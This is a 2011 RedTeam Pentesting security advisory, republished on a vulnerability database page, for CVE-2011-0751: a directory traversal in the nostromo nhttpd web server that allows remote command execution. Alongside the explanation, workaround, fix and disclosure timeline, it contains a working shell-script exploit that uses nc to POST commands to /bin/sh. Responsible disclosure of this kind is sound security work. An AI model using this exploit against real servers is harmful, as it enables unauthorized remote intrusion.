nostromo nhttpd directory traversal leading to arbitrary command execution

2011.03.18
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Advisory: nostromo nhttpd directory traversal leading to arbitrary command execution During a penetration test, RedTeam Pentesting discovered a directory traversal vulnerability leading to arbitrary command execution in the nostromo HTTP server. Details ======= Product: nostromo (nhttpd) Affected Versions: <= 1.9.3 Fixed Versions: CVS 2011-03-03, 1.9.4 Vulnerability Type: directory traversal Security Risk: high Vendor URL: http://www.nazgul.ch/dev_nostromo.html Vendor Status: patch available Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-001 Advisory Status: published CVE: CVE-2011-0751 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0751 Introduction ============ nhttpd is a simple, fast and secure HTTP server. It runs as a single process, handling connections with select(2). For CGIs and directory listing it does fork(2). nhttpd has the minimum of HTTP/1.1 and CGI/1.1 implemented. (from the vendor's homepage) More Details ============ When parsing HTTP requests, nostromo first checks for directory traversal attempts by searching for /../ in the request URI. However this check is performed before decoding escaped characters in the URI. Thus, directory traversal is possible by e.g. escaping the slashes in ../ as %2f. Unless the chroot feature of nostromo is used, any file in the system that is readable with the runtime permissions of nostromo can be accessed. A peculiarity of nostromo is the handling of CGI scripts. Citing the manual page, "CGIs are recognized by the file world executable flag". Therefore, any program or script, that is executable by the system user nostromo runs as, will be executed when one tries to access it through directory traversal. Any data received in the body of a HTTP POST request will be sent to standard input of executed CGI scripts. By using directory traversal to send a HTTP POST request to /bin/sh, and providing shell commands in the request body, arbitrary command execution is possible. Similarly, interpreters of programming languages that execute program code they receive via standard input, such as perl or python, can be used to execute arbitrary program code in those languages. Proof of Concept ================ The access log of nostromo can be accessed using an URL like this: http://www.example.org/..%2flogs/access_log The following simple shell script implements the arbitrary command execution described above using /bin/sh: ------------------------------------------------------------------------ #!/bin/sh ###################################### # # # RedTeam Pentesting GmbH # # kontakt (at) redteam-pentesting (dot) de [email concealed] # # http://www.redteam-pentesting.de # # # ###################################### if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST PORT COMMAND..." exit 2 fi HOST="$1" PORT="$2" shift 2 ( echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; echo "$@ 2>&1" ) | nc "$HOST" "$PORT" | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP' ------------------------------------------------------------------------ Workaround ========== When serving static files, the impact of this vulnerability can be reduced by using the chroot feature of nostromo. If CGI scripts are used, any interpreter required for these scripts might allow being abused as shown above. The nostromo configuration and log files remain accessible even when using the chroot feature. Fix === Upgrade to development version from CVS as of 2011-03-03 or version 1.9.4, once released. Security Risk ============= As an attacker is potentially able to execute arbitrary commands remotely, the risk is estimated as high. History ======= 2011-01-12 Problem identified during a penetration test 2011-01-20 Customer approves contacting vendor 2011-01-26 CVE number requested 2011-01-31 Vendor notified 2011-02-02 CVE number assigned 2011-02-05 Vendor confirmed the vulnerability and sent first patch for review 2011-02-10 Vendor sent final patch for review 2011-03-03 Vendor releases fix 2011-03-15 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Geschftsfhrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAABAgAGBQJNf5K1AAoJENG/HXWsgFSu5egH/ROv5q6QZlDpg7WAn5uojFq1 UobVxdbM8s00fgKcwzWiFB8Ph0hM0fo8TOh1XFVdPwhm/fp8/vgMJgo6LZlwX2De /iOWVyucTjcMQ/W+5cBcRyap4VVkx7TneOmKf+Ftb0fa9ReGe8aulXW/9DgaQOZ3 8oHVDsIbUejhEi7KaJLKPWk/C1eX6h26oLquUVoc8H+LDT6P8mNTv7erqGvelURm IX9MPm/GIWPIiG+TeZ2/1nuevrXhkqYoBRrqan4fYKD/cBtaosSPA0ztH72EATq9 REXEJ3nuEURdiXfLIjmaXY23RqkVoH9Ol7mSSFSQVhLgCbplQnLYbp0hCzcSjys= =fTBC -----END PGP SIGNATURE-----

References:

http://www.securityfocus.com/archive/1/archive/1/517026/100/0/threaded
http://www.redteam-pentesting.de/advisories/rt-sa-2011-001
http://www.nazgul.ch/dev_nostromo.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top